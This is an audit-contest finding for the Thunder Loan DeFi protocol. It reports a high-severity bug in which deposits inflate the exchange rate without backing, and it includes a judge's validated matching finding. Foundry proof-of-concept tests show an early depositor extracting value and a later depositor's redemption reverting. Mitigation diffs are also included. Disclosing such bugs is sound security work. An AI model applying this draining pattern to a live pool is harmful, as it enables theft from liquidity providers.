Thunder Loan

AI First Flight #7
Beginner FriendlyFoundryDeFiOracle
EXP
View results
Submission Details
Severity: high
Valid

Deposits inflate exchange rate without backing, enabling LP value extraction and withdrawal failures

Root + Impact

Description

Normal behavior
LP deposits should mint shares that are fully backed by underlying, and interest should accrue from flash‑loan fees, not from deposits.

Specific issue
deposit() increases the exchange rate using a computed “fee” but does not collect any additional underlying to fund that increase. This makes the pool insolvent relative to its own exchange rate. Early depositors can redeem more than they put in, and later depositors can be unable to redeem their full shares.

// src/protocol/AssetToken.sol:80-90
function updateExchangeRate(uint256 fee) external onlyThunderLoan {
uint256 newExchangeRate = s_exchangeRate * (totalSupply() + fee) / totalSupply();
// ...
}

Risk

Likelihood:

  • Deposits are a core protocol action and happen frequently.

  • The exchange rate is always adjusted on deposit.

Impact:

  • Pool becomes insolvent relative to exchange rate.

  • Early LPs can extract value from later LP deposits.

  • Later LP redemptions can revert (withdrawal DoS).


Proof of Concept

// SPDX-License-Identifier: MIT
pragma solidity 0.8.20;
import { BaseTest } from "../unit/BaseTest.t.sol";
import { AssetToken } from "../../src/protocol/AssetToken.sol";
contract F002_DepositExchangeRateInsolvency is BaseTest {
address internal attacker = address(0xA11CE);
address internal victim = address(0xB0B);
function setUp() public override {
super.setUp();
vm.prank(thunderLoan.owner());
thunderLoan.setAllowedToken(tokenA, true);
}
function test_early_depositor_can_extract_value_and_strand_late_depositor() public {
uint256 attackerDeposit = 1e18;
uint256 victimDeposit = 100e18;
tokenA.mint(attacker, attackerDeposit);
tokenA.mint(victim, victimDeposit);
vm.startPrank(attacker);
tokenA.approve(address(thunderLoan), attackerDeposit);
thunderLoan.deposit(tokenA, attackerDeposit);
vm.stopPrank();
vm.startPrank(victim);
tokenA.approve(address(thunderLoan), victimDeposit);
thunderLoan.deposit(tokenA, victimDeposit);
vm.stopPrank();
AssetToken asset = thunderLoan.getAssetFromToken(tokenA);
uint256 actualUnderlying = tokenA.balanceOf(address(asset));
uint256 requiredUnderlying =
(asset.totalSupply() * asset.getExchangeRate()) / asset.EXCHANGE_RATE_PRECISION();
assertLt(actualUnderlying, requiredUnderlying, "pool becomes insolvent vs its own exchangeRate");
uint256 attackerShares = asset.balanceOf(attacker);
vm.prank(attacker);
thunderLoan.redeem(tokenA, attackerShares);
assertGt(tokenA.balanceOf(attacker), attackerDeposit, "attacker extracts value from later deposits");
uint256 victimShares = asset.balanceOf(victim);
vm.prank(victim);
vm.expectRevert();
thunderLoan.redeem(tokenA, victimShares);
}
function test_fuzz_deposits_create_insolvency(uint96 rawA, uint96 rawB) public {
uint256 a = bound(uint256(rawA), 1, 1_000_000) * 1e18;
uint256 b = bound(uint256(rawB), 1, 1_000_000) * 1e18;
tokenA.mint(attacker, a);
tokenA.mint(victim, b);
vm.startPrank(attacker);
tokenA.approve(address(thunderLoan), a);
thunderLoan.deposit(tokenA, a);
vm.stopPrank();
vm.startPrank(victim);
tokenA.approve(address(thunderLoan), b);
thunderLoan.deposit(tokenA, b);
vm.stopPrank();
AssetToken asset = thunderLoan.getAssetFromToken(tokenA);
uint256 actualUnderlying = tokenA.balanceOf(address(asset));
uint256 requiredUnderlying =
(asset.totalSupply() * asset.getExchangeRate()) / asset.EXCHANGE_RATE_PRECISION();
assertLt(actualUnderlying, requiredUnderlying);
}
}

Recommended Mitigation


Option A (don’t update exchange rate on deposit)

- assetToken.updateExchangeRate(calculatedFee);
+ // Collect fee explicitly or mint fewer shares based on fee so backing matches rate
Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge 1 day ago
Submission Judgement Published
Validated
Assigned finding tags:

[H-02] Updating exchange rate on token deposit will inflate asset token's exchange rate faster than expected

# Summary Exchange rate for asset token is updated on deposit. This means users can deposit (which will increase exchange rate), and then immediately withdraw more underlying tokens than they deposited. # Details Per documentation: > Liquidity providers can deposit assets into ThunderLoan and be given AssetTokens in return. **These AssetTokens gain interest over time depending on how often people take out flash loans!** Asset tokens gain interest when people take out flash loans with the underlying tokens. In current version of ThunderLoan, exchange rate is also updated when user deposits underlying tokens. This does not match with documentation and will end up causing exchange rate to increase on deposit. This will allow anyone who deposits to immediately withdraw and get more tokens back than they deposited. Underlying of any asset token can be completely drained in this manner. # Filename `src/protocol/ThunderLoan.sol` # Permalinks https://github.com/Cyfrin/2023-11-Thunder-Loan/blob/8539c83865eb0d6149e4d70f37a35d9e72ac7404/src/protocol/ThunderLoan.sol#L153-L154 # Impact Users can deposit and immediately withdraw more funds. Since exchange rate is increased on deposit, they will withdraw more funds then they deposited without any flash loans being taken at all. # Recommendations It is recommended to not update exchange rate on deposits and updated it only when flash loans are taken, as per documentation. ```diff function deposit(IERC20 token, uint256 amount) external revertIfZero(amount) revertIfNotAllowedToken(token) { AssetToken assetToken = s_tokenToAssetToken[token]; uint256 exchangeRate = assetToken.getExchangeRate(); uint256 mintAmount = (amount * assetToken.EXCHANGE_RATE_PRECISION()) / exchangeRate; emit Deposit(msg.sender, token, amount); assetToken.mint(msg.sender, mintAmount); - uint256 calculatedFee = getCalculatedFee(token, amount); - assetToken.updateExchangeRate(calculatedFee); token.safeTransferFrom(msg.sender, address(assetToken), amount); } ``` # POC ```solidity function testExchangeRateUpdatedOnDeposit() public setAllowedToken { tokenA.mint(liquidityProvider, AMOUNT); tokenA.mint(user, AMOUNT); // deposit some tokenA into ThunderLoan vm.startPrank(liquidityProvider); tokenA.approve(address(thunderLoan), AMOUNT); thunderLoan.deposit(tokenA, AMOUNT); vm.stopPrank(); // another user also makes a deposit vm.startPrank(user); tokenA.approve(address(thunderLoan), AMOUNT); thunderLoan.deposit(tokenA, AMOUNT); vm.stopPrank(); AssetToken assetToken = thunderLoan.getAssetFromToken(tokenA); // after a deposit, asset token's exchange rate has aleady increased // this is only supposed to happen when users take flash loans with underlying assertGt(assetToken.getExchangeRate(), 1 * assetToken.EXCHANGE_RATE_PRECISION()); // now liquidityProvider withdraws and gets more back because exchange // rate is increased but no flash loans were taken out yet // repeatedly doing this could drain all underlying for any asset token vm.startPrank(liquidityProvider); thunderLoan.redeem(tokenA, assetToken.balanceOf(liquidityProvider)); vm.stopPrank(); assertGt(tokenA.balanceOf(liquidityProvider), AMOUNT); } ```

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!